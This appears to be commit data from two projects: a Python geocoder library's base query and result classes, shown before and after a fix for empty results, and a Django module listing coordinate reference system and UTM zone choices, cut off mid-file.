if distance < maximum:
return score
if distance >= 25:
return 1
# Cannot determine score
return 0
@property
def geometry(self):
if self.ok:
return {
'type': 'Point',
'coordinates': [self.x, self.y]}
return {}
@property
def osm(self):
osm = dict()
if self.ok:
osm['x'] = self.x
osm['y'] = self.y
if self.housenumber:
osm['addr:housenumber'] = self.housenumber
if self.road:
osm['addr:street'] = self.road
if self.city:
osm['addr:city'] = self.city
if self.state:
osm['addr:state'] = self.state
if self.country:
osm['addr:country'] = self.country
if self.postal:
osm['addr:postal'] = self.postal
if hasattr(self, 'population'):
if self.population:
osm['population'] = self.population
return osm
@property
def geojson(self):
feature = {
'type': 'Feature',
'properties': self.json,
}
if self.bbox:
feature['bbox'] = [self.west, self.south, self.east, self.north]
feature['properties']['bbox'] = feature['bbox']
if self.geometry:
feature['geometry'] = self.geometry
return feature
@property
def wkt(self):
if self.ok:
return 'POINT({x} {y})'.format(x=self.x, y=self.y)
return ''
@property
def xy(self):
if self.ok:
return [self.lng, self.lat]
return []
@property
def latlng(self):
if self.ok:
return [self.lat, self.lng]
return []
@property
def y(self):
return self.lat
@property
def x(self):
return self.lng
@property
def locality(self):
return self.city
@property
def province(self):
return self.state
@property
def street_number(self):
return self.housenumber
@property
def road(self):
return self.street
@property
def route(self):
return self.street
class MultipleResultsQuery(OrderedSet):
""" Will replace the Base class to support multiple results, with the following differences :
- split class into 2 parts :
- OneResult to actually store a (JSON) object from provider
- MultipleResultsQuery to manage the query
- class variables moved into instance
- remaining class variables are names with convention: _CAPITALS
- self.url derived from class var cls.URL, which must be a valid URL
- self.timeout has default value from class var cls.TIMEOUT
"""
_URL = None
_RESULT_CLASS = None
_KEY = None
_TIMEOUT = 5.0
@staticmethod
def _is_valid_url(url):
""" Helper function to validate that URLs are well formed, i.e that it contains a valid
protocol and a valid domain. It does not actually check if the URL exists
"""
try:
parsed = urlparse(url)
mandatory_parts = [parsed.scheme, parsed.netloc]
return all(mandatory_parts)
except:
return False
@classmethod
def _is_valid_result_class(cls):
return issubclass(cls._RESULT_CLASS, OneResult)
@classmethod
def _get_api_key(cls, key=None):
# Retrieves API Key from method argument first, then from Environment variables
key = key or cls._KEY
# raise exception if not valid key found
if not key:
raise ValueError('Provide API Key')
return key
def __init__(self, location, **kwargs):
super(MultipleResultsQuery, self).__init__()
# check validity of URL
if not self._is_valid_url(self._URL):
raise ValueError("Subclass must define a valid URL")
self.url = self._URL
# check validity of Result class
if not self._is_valid_result_class():
raise ValueError(
"Your class should define _RESULT_CLASS with a subclass of OneResult")
self.one_result = self._RESULT_CLASS
# check validity of provider key
provider_key = self._get_api_key(kwargs.pop('key', None))
# point to geocode, as a string or coordinates
self.location = location
# set attributes to manage query
self.encoding = kwargs.get('encoding', 'utf-8')
self.timeout = kwargs.get('timeout', self._TIMEOUT)
self.proxies = kwargs.get('proxies', '')
self.session = kwargs.get('session', requests.Session())
# headers can be overriden in _build_headers
self.headers = kwargs.get(
'headers', self._build_headers(provider_key, **kwargs))
# params can be overriden in _build_params
# it is an OrderedDict in order to preserver the order of the url query parameters
self.params = OrderedDict(kwargs.get(
'params', self._build_params(location, provider_key, **kwargs)))
# results of query (set by _connect)
self.status_code = None
self.response = None
self.error = False
# pointer to result where to delegates calls
self.current_result = None
# hook for children class to finalize their setup before the query
self._before_initialize(location, **kwargs)
# query and parse results
self._initialize()
def __repr__(self):
base_repr = u'<[{0}] {1} - {2} {{0}}>'.format(
self.status,
self.provider.title(),
self.method.title()
)
if len(self) == 0:
return base_repr.format(u'[empty]')
elif len(self) == 1:
return base_repr.format(repr(self[0]))
else:
return base_repr.format(u'#%s results' % len(self))
def _build_headers(self, provider_key, **kwargs):
"""Will be overridden according to the targetted web service"""
return {}
def _build_params(self, location, provider_key, **kwargs):
"""Will be overridden according to the targetted web service"""
return {}
def _before_initialize(self, location, **kwargs):
"""Can be overridden to finalize setup before the query"""
pass
def _initialize(self):
# query URL and get valid JSON (also stored in self.json)
json_response = self._connect()
# catch errors
has_error = self._catch_errors(
json_response) if json_response else True
# creates instances for results
if not has_error:
self._parse_results(json_response)
def _connect(self):
""" - Query self.url (validated cls._URL)
- Analyse reponse and set status, errors accordingly
- On success:
returns the content of the response as a JSON object
This object will be passed to self._parse_json_response
"""
self.status_code = 'Unknown'
try:
# make request and get response
self.response = response = self.rate_limited_get(
self.url,
params=self.params,
headers=self.headers,
timeout=self.timeout,
proxies=self.proxies
)
# check that response is ok
response.raise_for_status()
self.status_code = 200
# rely on json method to get non-empty well formatted JSON
json_response = response.json()
self.url = response.url
except requests.exceptions.RequestException:
# store real status code and error
self.status_code = response.status_code
self.error = u'ERROR - {}'.format(str(response))
# return False
return False
# return response within its JSON format
return json_response
def rate_limited_get(self, url, **kwargs):
""" By default, simply wraps a session.get request"""
return self.session.get(url, **kwargs)
def _adapt_results(self, json_content):
""" Allow children classes to format json_content into an array of objects
OVERRIDE TO FETCH the correct array of objects when necessary
"""
return json_content
def _parse_results(self, json_content):
""" Creates instances of self.one_result (validated cls._RESULT_CLASS)
from JSON results retrieved by self._connect
params: array of objects (dictionnaries)
"""
for json_dict in self._adapt_results(json_content):
self.add(self.one_result(json_dict))
# set default result to use for delegation
self.current_result = self[0]
def _catch_errors(self, json_response):
""" Checks the JSON returned from the provider and flag errors if necessary"""
return self.error
@property
def ok(self):
return len(self) > 0
@property
def status(self):
if self.ok:
return 'OK'
elif len(self) == 0:
return 'ERROR - No results found'
elif self.error:
return self.error
else:
return 'ERROR - Unhandled Exception'
@property
def geojson(self):
geojson_results = [result.geojson for result in self]
features = {
'type': 'FeatureCollection',
'features': geojson_results
}
return features
def debug(self):
print('===')
print(repr(self))
print('===')
print('')
print('#res: {}'.format(len(self)))
print('code: {}'.format(self.status_code))
print('url: {}'.format(self.url))
if self.ok:
for index, result in enumerate(self):
print('')
print('Details for result #{}'.format(index + 1))
print('---')
result.debug()
else:
print(self.status)
# Delegation to current result
def set_default_result(self, index):
""" change the result used to delegate the calls to. The provided index should be in the
range of results, otherwise it will raise an exception
"""
self.current_result = self[index]
def __getattr__(self, name):
""" Called when an attribute lookup has not found the attribute in the usual places (i.e.
it is not an instance attribute nor is it found in the class tree for self). name is
the attribute name. This method should return the (computed) attribute value or raise
an AttributeError exception.
Note that if the attribute is found through the normal mechanism, __getattr__() is not called.
"""
if self.current_result is None:
raise AttributeError("%s not found on %s, and current_result is None".format(
name, self.__class__.__name__
))
return getattr(self.current_result, name)
added check when no results
#!/usr/bin/python
# coding: utf8
from __future__ import absolute_import
import requests
import sys
import json
import six
from collections import defaultdict, OrderedDict
from orderedset import OrderedSet
from geocoder.distance import Distance
try:
from urlparse import urlparse
except ImportError:
from urllib.parse import urlparse
is_python2 = sys.version_info < (3, 0)
class Base(object):
_exclude = ['parse', 'json', 'url', 'fieldnames', 'help', 'debug',
'short_name', 'api', 'content', 'params',
'street_number', 'api_key', 'key', 'id', 'x', 'y',
'latlng', 'headers', 'timeout', 'wkt', 'locality',
'province', 'rate_limited_get', 'osm', 'route', 'schema',
'properties', 'geojson', 'tree', 'error', 'proxies', 'road',
'xy', 'northeast', 'northwest', 'southeast', 'southwest',
'road_long', 'city_long', 'state_long', 'country_long',
'postal_town_long', 'province_long', 'road_long',
'street_long', 'interpolated', 'method', 'geometry', 'session']
fieldnames = []
error = None
status_code = None
session = None
headers = {}
params = {}
# Essential attributes for Quality Control
lat = ''
lng = ''
accuracy = ''
quality = ''
confidence = ''
# Bounding Box attributes
northeast = []
northwest = []
southeast = []
southwest = []
bbox = {}
# Essential attributes for Street Address
address = ''
housenumber = ''
street = ''
road = ''
city = ''
state = ''
country = ''
postal = ''
def __repr__(self):
if self.address:
return u'<[{0}] {1} - {2} [{3}]>'.format(
self.status,
self.provider.title(),
self.method.title(),
six.text_type(self.address)
)
else:
return u'<[{0}] {1} - {2}>'.format(
self.status,
self.provider.title(),
self.method.title()
)
def rate_limited_get(self, url, **kwargs):
return self.session.get(url, **kwargs)
@staticmethod
def _get_api_key(base_key, **kwargs):
key = kwargs.get('key')
# Retrieves API Key from method argument first
if key:
return key
# Retrieves API Key from Environment variables
elif base_key:
return base_key
raise ValueError('Provide API Key')
def _connect(self, **kwargs):
self.status_code = 'Unknown'
self.timeout = kwargs.get('timeout', 5.0)
self.proxies = kwargs.get('proxies', '')
self.headers.update(kwargs.get('headers', {}))
self.params.update(kwargs.get('params', {}))
try:
r = self.rate_limited_get(
self.url,
params=self.params,
headers=self.headers,
timeout=self.timeout,
proxies=self.proxies
)
self.status_code = r.status_code
self.url = r.url
if r.content:
self.status_code = 200
except (KeyboardInterrupt, SystemExit):
raise
except requests.exceptions.SSLError:
self.status_code = 495
self.error = 'ERROR - SSLError'
# Open JSON content from Request connection
if self.status_code == 200:
try:
self.content = r.json()
except Exception as err:
self.status_code = 400
self.error = 'ERROR - JSON Corrupted: %s' % str(err)
self.content = r.content
def _initialize(self, **kwargs):
# Remove extra URL from kwargs
if 'url' in kwargs:
kwargs.pop('url')
self.json = {}
self.parse = self.tree()
self.content = None
self.encoding = kwargs.get('encoding', 'utf-8')
self.session = kwargs.get('session', requests.Session())
self._connect(url=self.url, **kwargs)
###
try:
for result in self.next(): # Convert to iterator in each of the search tools
self._build_tree(result)
self._exceptions()
self._catch_errors()
self._json()
except:
self._build_tree(self.content)
self._exceptions()
self._catch_errors()
self._json()
###
def _json(self):
self.fieldnames = []
for key in dir(self):
if not key.startswith('_') and key not in self._exclude:
self.fieldnames.append(key)
value = getattr(self, key)
if value:
self.json[key] = value
# Add OK attribute even if value is "False"
self.json['ok'] = self.ok
def debug(self):
print(json.dumps(self.parse, indent=4))
print(json.dumps(self.json, indent=4))
print('')
print('OSM Quality')
print('-----------')
count = 0
for key in self.osm:
if 'addr:' in key:
if self.json.get(key.replace('addr:', '')):
print('- [x] {0}'.format(key))
count += 1
else:
print('- [ ] {0}'.format(key))
print('({0}/{1})'.format(count, len(self.osm) - 2))
print('')
print('Fieldnames')
print('----------')
count = 0
for fieldname in self.fieldnames:
if self.json.get(fieldname):
print('- [x] {0}'.format(fieldname))
count += 1
else:
print('- [ ] {0}'.format(fieldname))
print('({0}/{1})'.format(count, len(self.fieldnames)))
print('')
print('URL')
print('---')
print(self.url)
def _exceptions(self):
pass
def _catch_errors(self):
pass
def tree(self):
return defaultdict(self.tree)
def _build_tree(self, content, last=''):
if content:
if isinstance(content, dict):
for key, value in content.items():
# Rebuild the tree if value is a dictionary
if isinstance(value, dict):
self._build_tree(value, last=key)
else:
if last:
self.parse[last][key] = value
else:
self.parse[key] = value
@property
def status(self):
if self.ok:
return 'OK'
elif self.error:
return self.error
if self.status_code == 200:
if not self.address:
return 'ERROR - No results found'
elif not (self.lng and self.lat):
return 'ERROR - No Geometry'
return 'ERROR - Unhandled Exception'
def _get_bbox(self, south, west, north, east):
if all([south, east, north, west]):
# South Latitude, West Longitude, North Latitude, East Longitude
self.south = float(south)
self.west = float(west)
self.north = float(north)
self.east = float(east)
# Bounding Box Corners
self.northeast = [self.north, self.east]
self.northwest = [self.north, self.west]
self.southwest = [self.south, self.west]
self.southeast = [self.south, self.east]
# GeoJSON bbox
self.westsouth = [self.west, self.south]
self.eastnorth = [self.east, self.north]
return dict(northeast=self.northeast, southwest=self.southwest)
return {}
@property
def confidence(self):
if self.bbox:
# Units are measured in Kilometers
distance = Distance(self.northeast, self.southwest, units='km')
for score, maximum in [(10, 0.25),
(9, 0.5),
(8, 1),
(7, 5),
(6, 7.5),
(5, 10),
(4, 15),
(3, 20),
(2, 25)]:
if distance < maximum:
return score
if distance >= 25:
return 1
# Cannot determine score
return 0
@property
def ok(self):
return bool(self.lng and self.lat)
@property
def geometry(self):
if self.ok:
return {
'type': 'Point',
'coordinates': [self.x, self.y]}
return {}
@property
def osm(self):
osm = dict()
if self.ok:
osm['x'] = self.x
osm['y'] = self.y
if self.housenumber:
osm['addr:housenumber'] = self.housenumber
if self.road:
osm['addr:street'] = self.road
if self.city:
osm['addr:city'] = self.city
if self.state:
osm['addr:state'] = self.state
if self.country:
osm['addr:country'] = self.country
if self.postal:
osm['addr:postal'] = self.postal
if hasattr(self, 'population'):
if self.population:
osm['population'] = self.population
return osm
@property
def geojson(self):
feature = {
'type': 'Feature',
'properties': self.json,
}
if self.bbox:
feature['bbox'] = [self.west, self.south, self.east, self.north]
feature['properties']['bbox'] = feature['bbox']
if self.geometry:
feature['geometry'] = self.geometry
return feature
@property
def wkt(self):
if self.ok:
return 'POINT({x} {y})'.format(x=self.x, y=self.y)
return ''
@property
def xy(self):
if self.ok:
return [self.lng, self.lat]
return []
@property
def latlng(self):
if self.ok:
return [self.lat, self.lng]
return []
@property
def y(self):
return self.lat
@property
def x(self):
return self.lng
@property
def locality(self):
return self.city
@property
def province(self):
return self.state
@property
def street_number(self):
return self.housenumber
@property
def road(self):
return self.street
@property
def route(self):
return self.street
class OneResult(object):
""" Container for one (JSON) object returned by the various web services"""
_TO_EXCLUDE = ['parse', 'json', 'url', 'fieldnames', 'help', 'debug',
'short_name', 'api', 'content', 'params',
'street_number', 'api_key', 'key', 'id', 'x', 'y',
'latlng', 'headers', 'timeout', 'wkt', 'locality',
'province', 'rate_limited_get', 'osm', 'route', 'schema',
'properties', 'geojson', 'tree', 'error', 'proxies', 'road',
'xy', 'northeast', 'northwest', 'southeast', 'southwest',
'road_long', 'city_long', 'state_long', 'country_long',
'postal_town_long', 'province_long', 'road_long',
'street_long', 'interpolated', 'method', 'geometry', 'session']
def __init__(self, json_content):
self.raw = json_content
# attributes required to compute bbox
self.northeast = []
self.northwest = []
self.southeast = []
self.southwest = []
# attributes returned in JSON format
self.fieldnames = []
self.json = {}
self._parse_json_with_fieldnames()
# Essential attributes for Quality Control
@property # noqa
def lat(self): return '' # noqa
@property # noqa
def lng(self): return '' # noqa
@property # noqa
def accuracy(self): return '' # noqa
@property # noqa
def quality(self): return '' # noqa
# Bounding Box attributes
@property # noqa
def bbox(self): return {} # noqa
# Essential attributes for Street Address
@property # noqa
def address(self): return '' # noqa
@property # noqa
def housenumber(self): return '' # noqa
@property # noqa
def street(self): return '' # noqa
@property # noqa
def city(self): return '' # noqa
@property # noqa
def state(self): return '' # noqa
@property # noqa
def country(self): return '' # noqa
@property # noqa
def postal(self): return '' # noqa
def __repr__(self):
""" Display [address] if available; [lat,lng] otherwise"""
if self.address:
return u'[{0}]'.format(six.text_type(self.address))
else:
return u'[{0},{1}]'.format(self.lat, self.lng)
def _parse_json_with_fieldnames(self):
""" Parse the raw JSON with all attributes/methods defined in the class, except for the
ones defined starting with '_' or flagged in cls._TO_EXCLUDE.
The final result is stored in self.json
"""
for key in dir(self):
if not key.startswith('_') and key not in self._TO_EXCLUDE:
self.fieldnames.append(key)
value = getattr(self, key)
if value:
self.json[key] = value
# Add OK attribute even if value is "False"
self.json['ok'] = self.ok
@property
def ok(self):
return bool(self.lng and self.lat)
@property
def status(self):
if self.ok:
return 'OK'
if not self.address:
return 'ERROR - No results found'
return 'ERROR - No Geometry'
def debug(self):
print('')
print('From provider')
print('-----------')
print(json.dumps(self.raw, indent=4))
print('')
print('Cleaned json')
print('-----------')
print(json.dumps(self.json, indent=4))
print('')
print('OSM Quality')
print('-----------')
count = 0
for key in self.osm:
if 'addr:' in key:
if self.json.get(key.replace('addr:', '')):
print('- [x] {0}'.format(key))
count += 1
else:
print('- [ ] {0}'.format(key))
print('({0}/{1})'.format(count, len(self.osm) - 2))
print('')
print('Fieldnames')
print('----------')
count = 0
for fieldname in self.fieldnames:
if self.json.get(fieldname):
print('- [x] {0}'.format(fieldname))
count += 1
else:
print('- [ ] {0}'.format(fieldname))
print('({0}/{1})'.format(count, len(self.fieldnames)))
def _get_bbox(self, south, west, north, east):
if all([south, east, north, west]):
# South Latitude, West Longitude, North Latitude, East Longitude
self.south = float(south)
self.west = float(west)
self.north = float(north)
self.east = float(east)
# Bounding Box Corners
self.northeast = [self.north, self.east]
self.northwest = [self.north, self.west]
self.southwest = [self.south, self.west]
self.southeast = [self.south, self.east]
# GeoJSON bbox
self.westsouth = [self.west, self.south]
self.eastnorth = [self.east, self.north]
return dict(northeast=self.northeast, southwest=self.southwest)
return {}
@property
def confidence(self):
if self.bbox:
# Units are measured in Kilometers
distance = Distance(self.northeast, self.southwest, units='km')
for score, maximum in [(10, 0.25),
(9, 0.5),
(8, 1),
(7, 5),
(6, 7.5),
(5, 10),
(4, 15),
(3, 20),
(2, 25)]:
if distance < maximum:
return score
if distance >= 25:
return 1
# Cannot determine score
return 0
@property
def geometry(self):
if self.ok:
return {
'type': 'Point',
'coordinates': [self.x, self.y]}
return {}
@property
def osm(self):
osm = dict()
if self.ok:
osm['x'] = self.x
osm['y'] = self.y
if self.housenumber:
osm['addr:housenumber'] = self.housenumber
if self.road:
osm['addr:street'] = self.road
if self.city:
osm['addr:city'] = self.city
if self.state:
osm['addr:state'] = self.state
if self.country:
osm['addr:country'] = self.country
if self.postal:
osm['addr:postal'] = self.postal
if hasattr(self, 'population'):
if self.population:
osm['population'] = self.population
return osm
@property
def geojson(self):
feature = {
'type': 'Feature',
'properties': self.json,
}
if self.bbox:
feature['bbox'] = [self.west, self.south, self.east, self.north]
feature['properties']['bbox'] = feature['bbox']
if self.geometry:
feature['geometry'] = self.geometry
return feature
@property
def wkt(self):
if self.ok:
return 'POINT({x} {y})'.format(x=self.x, y=self.y)
return ''
@property
def xy(self):
if self.ok:
return [self.lng, self.lat]
return []
@property
def latlng(self):
if self.ok:
return [self.lat, self.lng]
return []
@property
def y(self):
return self.lat
@property
def x(self):
return self.lng
@property
def locality(self):
return self.city
@property
def province(self):
return self.state
@property
def street_number(self):
return self.housenumber
@property
def road(self):
return self.street
@property
def route(self):
return self.street
class MultipleResultsQuery(OrderedSet):
""" Will replace the Base class to support multiple results, with the following differences :
- split class into 2 parts :
- OneResult to actually store a (JSON) object from provider
- MultipleResultsQuery to manage the query
- class variables moved into instance
- remaining class variables are names with convention: _CAPITALS
- self.url derived from class var cls.URL, which must be a valid URL
- self.timeout has default value from class var cls.TIMEOUT
"""
_URL = None
_RESULT_CLASS = None
_KEY = None
_TIMEOUT = 5.0
@staticmethod
def _is_valid_url(url):
""" Helper function to validate that URLs are well formed, i.e that it contains a valid
protocol and a valid domain. It does not actually check if the URL exists
"""
try:
parsed = urlparse(url)
mandatory_parts = [parsed.scheme, parsed.netloc]
return all(mandatory_parts)
except:
return False
@classmethod
def _is_valid_result_class(cls):
return issubclass(cls._RESULT_CLASS, OneResult)
@classmethod
def _get_api_key(cls, key=None):
# Retrieves API Key from method argument first, then from Environment variables
key = key or cls._KEY
# raise exception if not valid key found
if not key:
raise ValueError('Provide API Key')
return key
def __init__(self, location, **kwargs):
super(MultipleResultsQuery, self).__init__()
# check validity of URL
if not self._is_valid_url(self._URL):
raise ValueError("Subclass must define a valid URL")
self.url = self._URL
# check validity of Result class
if not self._is_valid_result_class():
raise ValueError(
"Your class should define _RESULT_CLASS with a subclass of OneResult")
self.one_result = self._RESULT_CLASS
# check validity of provider key
provider_key = self._get_api_key(kwargs.pop('key', None))
# point to geocode, as a string or coordinates
self.location = location
# set attributes to manage query
self.encoding = kwargs.get('encoding', 'utf-8')
self.timeout = kwargs.get('timeout', self._TIMEOUT)
self.proxies = kwargs.get('proxies', '')
self.session = kwargs.get('session', requests.Session())
# headers can be overriden in _build_headers
self.headers = kwargs.get(
'headers', self._build_headers(provider_key, **kwargs))
# params can be overriden in _build_params
# it is an OrderedDict in order to preserver the order of the url query parameters
self.params = OrderedDict(kwargs.get(
'params', self._build_params(location, provider_key, **kwargs)))
# results of query (set by _connect)
self.status_code = None
self.response = None
self.error = False
# pointer to result where to delegates calls
self.current_result = None
# hook for children class to finalize their setup before the query
self._before_initialize(location, **kwargs)
# query and parse results
self._initialize()
def __repr__(self):
base_repr = u'<[{0}] {1} - {2} {{0}}>'.format(
self.status,
self.provider.title(),
self.method.title()
)
if len(self) == 0:
return base_repr.format(u'[empty]')
elif len(self) == 1:
return base_repr.format(repr(self[0]))
else:
return base_repr.format(u'#%s results' % len(self))
def _build_headers(self, provider_key, **kwargs):
"""Will be overridden according to the targetted web service"""
return {}
def _build_params(self, location, provider_key, **kwargs):
"""Will be overridden according to the targetted web service"""
return {}
def _before_initialize(self, location, **kwargs):
"""Can be overridden to finalize setup before the query"""
pass
def _initialize(self):
# query URL and get valid JSON (also stored in self.json)
json_response = self._connect()
# catch errors
has_error = self._catch_errors(
json_response) if json_response else True
# creates instances for results
if not has_error:
self._parse_results(json_response)
def _connect(self):
""" - Query self.url (validated cls._URL)
- Analyse reponse and set status, errors accordingly
- On success:
returns the content of the response as a JSON object
This object will be passed to self._parse_json_response
"""
self.status_code = 'Unknown'
try:
# make request and get response
self.response = response = self.rate_limited_get(
self.url,
params=self.params,
headers=self.headers,
timeout=self.timeout,
proxies=self.proxies
)
# check that response is ok
response.raise_for_status()
self.status_code = 200
# rely on json method to get non-empty well formatted JSON
json_response = response.json()
self.url = response.url
except requests.exceptions.RequestException:
# store real status code and error
self.status_code = response.status_code
self.error = u'ERROR - {}'.format(str(response))
# return False
return False
# return response within its JSON format
return json_response
def rate_limited_get(self, url, **kwargs):
""" By default, simply wraps a session.get request"""
return self.session.get(url, **kwargs)
def _adapt_results(self, json_content):
""" Allow children classes to format json_content into an array of objects
OVERRIDE TO FETCH the correct array of objects when necessary
"""
return json_content
def _parse_results(self, json_content):
""" Creates instances of self.one_result (validated cls._RESULT_CLASS)
from JSON results retrieved by self._connect
params: array of objects (dictionnaries)
"""
for json_dict in self._adapt_results(json_content):
self.add(self.one_result(json_dict))
# set default result to use for delegation
self.current_result = len(self) > 0 and self[0]
def _catch_errors(self, json_response):
""" Checks the JSON returned from the provider and flag errors if necessary"""
return self.error
@property
def ok(self):
return len(self) > 0
@property
def status(self):
if self.ok:
return 'OK'
elif len(self) == 0:
return 'ERROR - No results found'
elif self.error:
return self.error
else:
return 'ERROR - Unhandled Exception'
@property
def geojson(self):
geojson_results = [result.geojson for result in self]
features = {
'type': 'FeatureCollection',
'features': geojson_results
}
return features
def debug(self):
print('===')
print(repr(self))
print('===')
print('')
print('#res: {}'.format(len(self)))
print('code: {}'.format(self.status_code))
print('url: {}'.format(self.url))
if self.ok:
for index, result in enumerate(self):
print('')
print('Details for result #{}'.format(index + 1))
print('---')
result.debug()
else:
print(self.status)
# Delegation to current result
def set_default_result(self, index):
""" change the result used to delegate the calls to. The provided index should be in the
range of results, otherwise it will raise an exception
"""
self.current_result = self[index]
def __getattr__(self, name):
""" Called when an attribute lookup has not found the attribute in the usual places (i.e.
it is not an instance attribute nor is it found in the class tree for self). name is
the attribute name. This method should return the (computed) attribute value or raise
an AttributeError exception.
Note that if the attribute is found through the normal mechanism, __getattr__() is not called.
"""
if not self.ok:
raise ValueError(self.status)
if self.current_result is None:
raise AttributeError("%s not found on %s, and current_result is None".format(
name, self.__class__.__name__
))
return getattr(self.current_result, name)
|
from django.utils.translation import gettext as _
# most common reference systems
WGS_84 = 4326
WGS_72 = 4322
PSEUDO_MERCATOR = 3857
NAD_83 = 4629
OSGB_36 = 4277
GLOBAL_CHOICES = (
(WGS_84, _('WGS 84')),
(PSEUDO_MERCATOR, _('Pseudo-Mercator')),
(WGS_72, _('WGS 72')),
(NAD_83, _('NAD 83')),
(OSGB_36, _('OSGB 36')),
)
UTM_ZONE_CHOICES = (
(32601, _('UTM Zone 1, northern hemisphere')),
(32602, _('UTM Zone 2, northern hemisphere')),
(32603, _('UTM Zone 3, northern hemisphere')),
(32604, _('UTM Zone 4, northern hemisphere')),
(32605, _('UTM Zone 5, northern hemisphere')),
(32606, _('UTM Zone 6, northern hemisphere')),
(32607, _('UTM Zone 7, northern hemisphere')),
(32608, _('UTM Zone 8, northern hemisphere')),
(32609, _('UTM Zone 9, northern hemisphere')),
(32610, _('UTM Zone 10, northern hemisphere')),
(32611, _('UTM Zone 11, northern hemisphere')),
(32612, _('UTM Zone 12, northern hemisphere')),
(32613, _('UTM Zone 13, northern hemisphere')),
(32614, _('UTM Zone 14, northern hemisphere')),
(32615, _('UTM Zone 15, northern hemisphere')),
(32616, _('UTM Zone 16, northern hemisphere')),
(32617, _('UTM Zone 17, northern hemisphere')),
(32618, _('UTM Zone 18, northern hemisphere')),
(32619, _('UTM Zone 19, northern hemisphere')),
(32620, _('UTM Zone 20, northern hemisphere')),
(32621, _('UTM Zone 21, northern hemisphere')),
(32622, _('UTM Zone 22, northern hemisphere')),
(32623, _('UTM Zone 23, northern hemisphere')),
(32624, _('UTM Zone 24, northern hemisphere')),
(32625, _('UTM Zone 25, northern hemisphere')),
(32626, _('UTM Zone 26, northern hemisphere')),
(32627, _('UTM Zone 27, northern hemisphere')),
(32628, _('UTM Zone 28, northern hemisphere')),
(32629, _('UTM Zone 29, northern hemisphere')),
(32630, _('UTM Zone 30, northern hemisphere')),
(32631, _('UTM Zone 31, northern hemisphere')),
(32632, _('UTM Zone 32, northern hemisphere')),
(32633, _('UTM Zone 33, northern hemisphere')),
(32634, _('UTM Zone 34, northern hemisphere')),
(32635, _('UTM Zone 35, northern hemisphere')),
(32636, _('UTM Zone 36, northern hemisphere')),
(32637, _('UTM Zone 37, northern hemisphere')),
(32638, _('UTM Zone 38, northern hemisphere')),
(32639, _('UTM Zone 39, northern hemisphere')),
(32640, _('UTM Zone 40, northern hemisphere')),
(32641, _('UTM Zone 41, northern hemisphere')),
(32642, _('UTM Zone 42, northern hemisphere')),
(32643, _('UTM Zone 43, northern hemisphere')),
(32644, _('UTM Zone 44, northern hemisphere')),
(32645, _('UTM Zone 45, northern hemisphere')),
(32646, _('UTM Zone 46, northern hemisphere')),
(32647, _('UTM Zone 47, northern hemisphere')),
(32648, _('UTM Zone 48, northern hemisphere')),
(32649, _('UTM Zone 49, northern hemisphere')),
(32650, _('UTM Zone 50, northern hemisphere')),
(32651, _('UTM Zone 51, northern hemisphere')),
(32652, _('UTM Zone 52, northern hemisphere')),
(32653, _('UTM Zone 53, northern hemisphere')),
(32654, _('UTM Zone 54, northern hemisphere')),
(32655, _('UTM Zone 55, northern hemisphere')),
(32656, _('UTM Zone 56, northern hemisphere')),
(32657, _('UTM Zone 57, northern hemisphere')),
(32658, _('UTM Zone 58, northern hemisphere')),
(32659, _('UTM Zone 59, northern hemisphere')),
(32660, _('UTM Zone 60, northern hemisphere')),
(32701, _('UTM Zone 1, southern hemisphere')),
(32702, _('UTM Zone 2, southern hemisphere')),
(32703, _('UTM Zone 3, southern hemisphere')),
(32704, _('UTM Zone 4, southern hemisphere')),
(32705, _('UTM Zone 5, southern hemisphere')),
(32706, _('UTM Zone 6, southern hemisphere')),
(32707, _('UTM Zone 7, southern hemisphere')),
(32708, _('UTM Zone 8, southern hemisphere')),
(32709, _('UTM Zone 9, southern hemisphere')),
(32710, _('UTM Zone 10, southern hemisphere')),
(32711, _('UTM Zone 11, southern hemisphere')),
(32712, _('UTM Zone 12, southern hemisphere')),
(32713, _('UTM Zone 13, southern hemisphere')),
(32714, _('UTM Zone 14, southern hemisphere')),
(32715, _('UTM Zone 15, southern hemisphere')),
(32716, _('UTM Zone 16, southern hemisphere')),
(32717, _('UTM Zone 17, southern hemisphere')),
(32718, _('UTM Zone 18, southern hemisphere')),
(32719, _('UTM Zone 19, southern hemisphere')),
(32720, _('UTM Zone 20, southern hemisphere')),
(32721, _('UTM Zone 21, southern hemisphere')),
(32722, _('UTM Zone 22, southern hemisphere')),
(32723, _('UTM Zone 23, southern hemisphere')),
(32724, _('UTM Zone 24, southern hemisphere')),
(32725, _('UTM Zone 25, southern hemisphere')),
(32726, _('UTM Zone 26, southern hemisphere')),
(32727, _('UTM Zone 27, southern hemisphere')),
(32728, _('UTM Zone 28, southern hemisphere')),
(32729, _('UTM Zone 29, southern hemisphere')),
(32730, _('UTM Zone 30, southern hemisphere')),
(32731, _('UTM Zone 31, southern hemisphere')),
(32732, _('UTM Zone 32, southern hemisphere')),
(32733, _('UTM Zone 33, southern hemisphere')),
(32734, _('UTM Zone 34, southern hemisphere')),
(32735, _('UTM Zone 35, southern hemisphere')),
(32736, _('UTM Zone 36, southern hemisphere')),
(32737, _('UTM Zone 37, southern hemisphere')),
(32738, _('UTM Zone 38, southern hemisphere')),
(32739, _('UTM Zone 39, southern hemisphere')),
(32740, _('UTM Zone 40, southern hemisphere')),
(32741, _('UTM Zone 41, southern hemisphere')),
(32742, _('UTM Zone 42, southern hemisphere')),
(32743, _('UTM Zone 43, southern hemisphere')),
(32744, _('UTM Zone 44, southern hemisphere')),
(32745, _('UTM Zone 45, southern hemisphere')),
(32746, _('UTM Zone 46, southern hemisphere')),
(32747, _('UTM Zone 47, southern hemisphere')),
(32748, _('UTM Zone 48, southern hemisphere')),
(32749, _('UTM Zone 49, southern hemisphere')),
(32750, _('UTM Zone 50, southern hemisphere')),
(32751, _('UTM Zone 51, southern hemisphere')),
(32752, _('UTM Zone 52, southern hemisphere')),
(32753, _('UTM Zone 53, southern hemisphere')),
(32754, _('UTM Zone 54, southern hemisphere')),
(32755, _('UTM Zone 55, southern hemisphere')),
(32756, _('UTM Zone 56, southern hemisphere')),
(32757, _('UTM Zone 57, southern hemisphere')),
(32758, _('UTM Zone 58, southern hemisphere')),
(32759, _('UTM Zone 59, southern hemisphere')),
(32760, _('UTM Zone 60, southern hemisphere')),
)
CRS_CHOICES = (
(_('Global coordinate reference systems'), GLOBAL_CHOICES),
(_('UTM zones'), UTM_ZONE_CHOICES),
)
lazy translation for CRS choices
from django.utils.translation import gettext_lazy as _
# most common reference systems
WGS_84 = 4326
WGS_72 = 4322
PSEUDO_MERCATOR = 3857
NAD_83 = 4629
OSGB_36 = 4277
GLOBAL_CHOICES = (
(WGS_84, _('WGS 84')),
